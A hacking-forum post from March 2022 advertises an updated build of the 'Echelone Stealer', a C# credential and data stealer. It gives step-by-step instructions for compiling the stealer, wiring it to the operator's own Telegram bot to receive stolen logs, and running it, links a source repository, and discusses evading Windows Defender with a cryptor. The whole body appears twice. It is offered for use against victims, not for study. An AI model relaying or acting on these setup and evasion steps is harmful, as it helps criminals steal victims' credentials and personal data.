OP 11 March, 2022 - 05:12 PM
(This post was last modified: 12 March, 2022 - 02:26 PM by aprov. Edited 1 time in total.)
Hello. I updated the Echelone Stealer. This stealer was originally made by Madcod.
Language: C#
This stealer sends logs to your telegram bot. This means that you do not need to use hosting or VDS. Just change the settings and your bot will send logs to you in telegram.
I updated the project to a new version of the .net Framework, worked on making the stealer send data much faster. I have also translated all comments into English.
I tried to hide this stealer from windows defender but I don't understand cryptography and don't think it's possible with C# without using a stub.
I also worked on so that you can download my repository and immediately compile the project without making any changes
How to use:
- Download the project from GitHub
- Open echelone.sln
- Change the build configuration to Release
- Open Program.cs
- Create your Telegram bot with @Botfather
- Change string Token to your telegram bot's token
- Now get your Chat ID from here: @my_id_bot
- Change string ID to your telegram chat ID
- Change other settings as you wish
- Send a "/start" message to your bot
- You can run stealer
Source: https://github.com/vosZix/my_update_echelone_steal
Of course, without the use of a cryptor, an antivirus will detect Echelone
Language: C#
This stealer sends logs to your telegram bot. This means that you do not need to use hosting or VDS. Just change the settings and your bot will send logs to you in telegram.
I updated the project to a new version of the .net Framework, worked on making the stealer send data much faster. I have also translated all comments into English.
I tried to hide this stealer from windows defender but I don't understand cryptography and don't think it's possible with C# without using a stub.
I also worked on so that you can download my repository and immediately compile the project without making any changes
How to use:
- Download the project from GitHub
- Open echelone.sln
- Change the build configuration to Release
- Open Program.cs
- Create your Telegram bot with @
- Change string Token to your telegram bot's token
- Now get your Chat ID from here: @my_id_bot
- Change string ID to your telegram chat ID
- Change other settings as you wish
- Send a "/start" message to your bot
- You can run stealer
Source: https://github.com/vosZix/my_update_echelone_steal
Of course, without the use of a cryptor, an antivirus will detect Echelone